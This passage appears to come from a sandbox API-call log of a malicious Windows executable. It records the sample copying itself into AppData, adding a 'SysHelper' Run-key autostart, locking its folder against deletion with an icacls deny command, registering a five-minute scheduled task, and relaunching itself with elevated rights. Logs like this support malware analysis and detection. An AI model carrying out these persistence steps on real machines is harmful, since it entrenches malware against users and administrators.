bInheritHandle=0, dwProcessId=0x97c) returned 0x5b8 [0094.306] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.307] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1070000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0094.307] CloseHandle (hObject=0x5b8) returned 1 [0094.307] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x5b8 [0094.307] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.308] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x140000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0094.309] CloseHandle (hObject=0x5b8) returned 1 [0094.309] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x5b8 [0094.309] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.310] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x980000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="meta_failures.exe") returned 0x11 [0094.310] CloseHandle (hObject=0x5b8) returned 1 [0094.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x5b8 [0094.310] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.312] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x11c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="complement.exe") returned 0xe [0094.312] CloseHandle (hObject=0x5b8) returned 1 [0094.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0094.312] CloseHandle (hObject=0x0) returned 0 [0094.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa10) returned 0x0 [0094.312] CloseHandle (hObject=0x0) returned 0 [0094.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb10) returned 0x0 [0094.312] CloseHandle (hObject=0x0) returned 0 [0094.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb00) returned 0x5b8 [0094.312] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.314] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x400000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="h1rxxmJek7fnkHTT.exe") returned 0x14 [0094.314] CloseHandle (hObject=0x5b8) returned 1 [0094.320] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x779ba8 [0094.320] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31fbae0 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31f8308 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31f7388 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31f75f0 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31f7858 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31ed308 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31ed570 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31ed7d8 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31eda40 [0094.321] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x31edca8 [0094.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d298 | out: phkResult=0x18d298*=0x5b8) returned 0x0 [0094.334] RegQueryValueExW (in: hKey=0x5b8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d294, lpData=0x18b9c0, lpcbData=0x18d278*=0x400 | out: lpType=0x18d294*=0x0, lpData=0x18b9c0*=0x0, lpcbData=0x18d278*=0x400) returned 0x2 [0094.334] RegCloseKey (hKey=0x5b8) returned 0x0 [0094.334] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0094.334] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0094.335] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" " [0094.335] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" ", pNumArgs=0x18d25c | out: pNumArgs=0x18d25c) returned 0x799378*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0094.335] lstrcpyW (in: lpString1=0x18b1c0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0094.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe") returned="h1rxxmJek7fnkHTT.exe" [0094.335] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18c9c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0094.335] UuidCreate (in: Uuid=0x18d20c | out: Uuid=0x18d20c) returned 0x0 [0094.335] UuidToStringW (in: Uuid=0x18d20c, StringUuid=0x18d2a0 | out: StringUuid=0x18d2a0) returned 0x0 [0094.335] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x31e00d8 [0094.335] RpcMgmtStatsVectorFree (in: StatsVector=0x18d2a0 | out: StatsVector=0x18d2a0) returned 0x0 [0094.335] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="97f793e1-7a7e-4733-93ae-21a624f0cac5" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5") returned 1 [0094.335] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\97f793e1-7a7e-4733-93ae-21a624f0cac5"), lpSecurityAttributes=0x0) returned 1 [0094.336] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xb0) returned 0x3221e88 [0094.336] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xb0) returned 0x3221f40 [0094.336] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5", pMore="h1rxxmJek7fnkHTT.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned 1 [0094.336] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmjek7fnkhtt.exe")) returned 0 [0094.336] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmjek7fnkhtt.exe"), bFailIfExists=0) returned 1 [0094.379] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d29c | out: phkResult=0x18d29c*=0x5bc) returned 0x0 [0094.379] lstrcpyW (in: lpString1=0x18c1c0, lpString2="\"" | out: lpString1="\"") returned="\"" [0094.379] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" [0094.379] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart" [0094.379] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart") returned 115 [0094.379] RegSetValueExW (in: hKey=0x5bc, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart", cbData=0xe6 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart") returned 0x0 [0094.380] RegCloseKey (hKey=0x5bc) returned 0x0 [0094.380] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd0) returned 0x31a04c0 [0094.380] SetLastError (dwErrCode=0x0) [0094.380] lstrcpyW (in: lpString1=0x18a1c0, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0094.380] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5" [0094.380] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0094.380] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d1c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d21c | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18d21c*(hProcess=0x5b8, hThread=0x5bc, dwProcessId=0x1c4, dwThreadId=0x5f4)) returned 1 [0094.396] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.633] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.687] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.707] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.715] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.730] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.746] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.761] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.777] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.792] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0094.808] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x0 [0094.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3221f40 | out: hHeap=0x750000) returned 1 [0094.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e00d8 | out: hHeap=0x750000) returned 1 [0094.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd0) returned 0x31a0598 [0094.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd0) returned 0x31a0670 [0094.818] CoInitialize (pvReserved=0x0) returned 0x0 [0095.629] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0095.630] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd0) returned 0x31a08f8 [0095.630] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d284 | out: ppv=0x18d284*=0x28f08e0) returned 0x0 [0096.154] TaskScheduler:ITaskService:Connect (This=0x28f08e0, serverName=0x18cd10*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x67, varVal2=0xd0), user=0x18cd20*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18cd30*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18cd40*(varType=0x0, wReserved1=0x31e, wReserved2=0xd22c, wReserved3=0x18, varVal1=0x420cab, varVal2=0x750000)) returned 0x0 [0096.158] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4000 [0096.158] TaskScheduler:ITaskService:GetFolder (in: This=0x28f08e0, Path="\\", ppFolder=0x18d28c | out: ppFolder=0x18d28c*=0x26ff98) returned 0x0 [0096.164] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4000 | out: hHeap=0x750000) returned 1 [0096.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4000 [0096.164] ITaskFolder:DeleteTask (This=0x26ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0096.167] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4000 | out: hHeap=0x750000) returned 1 [0096.167] TaskScheduler:ITaskService:NewTask (in: This=0x28f08e0, flags=0x0, ppDefinition=0x18d290 | out: ppDefinition=0x18d290*=0x28f0968) returned 0x0 [0096.289] TaskScheduler:IUnknown:Release (This=0x28f08e0) returned 0x1 [0096.289] ITaskDefinition:get_RegistrationInfo (in: This=0x28f0968, ppRegistrationInfo=0x18d264 | out: ppRegistrationInfo=0x18d264*=0x28f0a28) returned 0x0 [0096.289] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.289] IRegistrationInfo:put_Author (This=0x28f0a28, Author="Author Name") returned 0x0 [0096.289] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.289] IUnknown:Release (This=0x28f0a28) returned 0x1 [0096.289] ITaskDefinition:get_Principal (in: This=0x28f0968, ppPrincipal=0x18d26c | out: ppPrincipal=0x18d26c*=0x28f0bb8) returned 0x0 [0096.289] IPrincipal:put_LogonType (This=0x28f0bb8, LogonType=3) returned 0x0 [0096.289] IUnknown:Release (This=0x28f0bb8) returned 0x1 [0096.290] ITaskDefinition:get_Settings (in: This=0x28f0968, ppSettings=0x18d274 | out: ppSettings=0x18d274*=0x28f0ad8) returned 0x0 [0096.290] ITaskSettings:put_StartWhenAvailable (This=0x28f0ad8, StartWhenAvailable=1) returned 0x0 [0096.290] IUnknown:Release (This=0x28f0ad8) returned 0x1 [0096.290] ITaskSettings:get_IdleSettings (in: This=0x28f0ad8, ppIdleSettings=0x18d258 | out: ppIdleSettings=0x18d258*=0x28f0b48) returned 0x0 [0096.290] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.290] IIdleSettings:put_WaitTimeout (This=0x28f0b48, WaitTimeout="PT5M") returned 0x0 [0096.290] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.291] IUnknown:Release (This=0x28f0b48) returned 0x1 [0096.291] ITaskDefinition:get_Triggers (in: This=0x28f0968, ppTriggers=0x18d254 | out: ppTriggers=0x18d254*=0x28f0a98) returned 0x0 [0096.291] ITriggerCollection:Create (in: This=0x28f0a98, Type=1, ppTrigger=0x18d260 | out: ppTrigger=0x18d260*=0x28f0c18) returned 0x0 [0096.291] IUnknown:Release (This=0x28f0a98) returned 0x1 [0096.291] IUnknown:QueryInterface (in: This=0x28f0c18, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d27c | out: ppvObject=0x18d27c*=0x28f0c18) returned 0x0 [0096.291] IUnknown:Release (This=0x28f0c18) returned 0x2 [0096.291] ITrigger:get_Repetition (in: This=0x28f0c18, ppRepeat=0x18d268 | out: ppRepeat=0x18d268*=0x28f0c68) returned 0x0 [0096.291] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.291] IRepetitionPattern:put_Interval (This=0x28f0c68, Interval="PT5M") returned 0x0 [0096.291] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.291] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.291] IRepetitionPattern:put_Duration (This=0x28f0c68, Duration="") returned 0x0 [0096.328] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.355] ITrigger:put_Repetition (This=0x28f0c18, Repetition=0x28f0c68) returned 0x0 [0096.355] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.355] ITrigger:put_Id (This=0x28f0c18, Id="Trigger1") returned 0x0 [0096.355] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.355] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.355] ITrigger:put_EndBoundary (This=0x28f0c18, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0096.356] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18cd3c | out: lpSystemTimeAsFileTime=0x18cd3c*(dwLowDateTime=0x176d22e0, dwHighDateTime=0x1d5fd35)) [0096.367] GetLastError () returned 0x0 [0096.389] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x24) returned 0x321c8a8 [0096.401] GetLastError () returned 0x0 [0096.412] GetLastError () returned 0x0 [0096.423] GetLastError () returned 0x0 [0096.446] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0096.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cca4 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18cca4) returned 26 [0096.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cca4 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18cca4) returned 26 [0096.519] GetLastError () returned 0x0 [0096.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x24) returned 0x321c728 [0096.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x321c728, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0096.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xa0) returned 0x7ede40 [0096.520] GetLastError () returned 0x0 [0096.520] ITrigger:put_StartBoundary (This=0x28f0c18, StartBoundary="2020-03-19T01:56:14") returned 0x0 [0096.520] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.520] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31f02c0 | out: hHeap=0x750000) returned 1 [0096.520] IUnknown:Release (This=0x28f0c18) returned 0x1 [0096.520] ITaskDefinition:get_Actions (in: This=0x28f0968, ppActions=0x18d270 | out: ppActions=0x18d270*=0x28f09e0) returned 0x0 [0096.520] IActionCollection:Create (in: This=0x28f09e0, Type=0, ppAction=0x18d25c | out: ppAction=0x18d25c*=0x28f0ca0) returned 0x0 [0096.538] IUnknown:Release (This=0x28f09e0) returned 0x1 [0096.538] IUnknown:QueryInterface (in: This=0x28f0ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d278 | out: ppvObject=0x18d278*=0x28f0ca0) returned 0x0 [0096.538] IUnknown:Release (This=0x28f0ca0) returned 0x2 [0096.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.538] IExecAction:put_Path (This=0x28f0ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned 0x0 [0096.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.538] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.538] IExecAction:put_Arguments (This=0x28f0ca0, Arguments="--Task") returned 0x0 [0096.538] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.538] IUnknown:Release (This=0x28f0ca0) returned 0x1 [0096.539] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x31e4030 [0096.539] ITaskFolder:RegisterTaskDefinition (in: This=0x26ff98, Path="Time Trigger Task", pDefinition=0x28f0968, flags=6, UserId=0x18cd18*(varType=0x0, wReserved1=0x31e, wReserved2=0xd22c, wReserved3=0x18, varVal1=0x420cab, varVal2=0x750000), password=0x18cd28*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18cd3c*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18d244 | out: ppTask=0x18d244*=0x28f0d10) returned 0x0 [0096.945] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e4030 | out: hHeap=0x750000) returned 1 [0096.946] TaskScheduler:IUnknown:Release (This=0x26ff98) returned 0x0 [0096.946] TaskScheduler:IUnknown:Release (This=0x28f0968) returned 0x0 [0096.946] IUnknown:Release (This=0x28f0d10) returned 0x0 [0096.946] CoUninitialize () [0096.950] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31a08f8 | out: hHeap=0x750000) returned 1 [0096.950] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31a0670 | out: hHeap=0x750000) returned 1 [0096.950] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31a0598 | out: hHeap=0x750000) returned 1 [0096.950] GetVersion () returned 0x1db10106 [0096.950] lstrcpyW (in: lpString1=0x18d6a8, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0096.950] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0096.950] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0096.950] ShellExecuteExW (in: pExecInfo=0x18d46c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18d46c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0097.192] HeapFree (in: 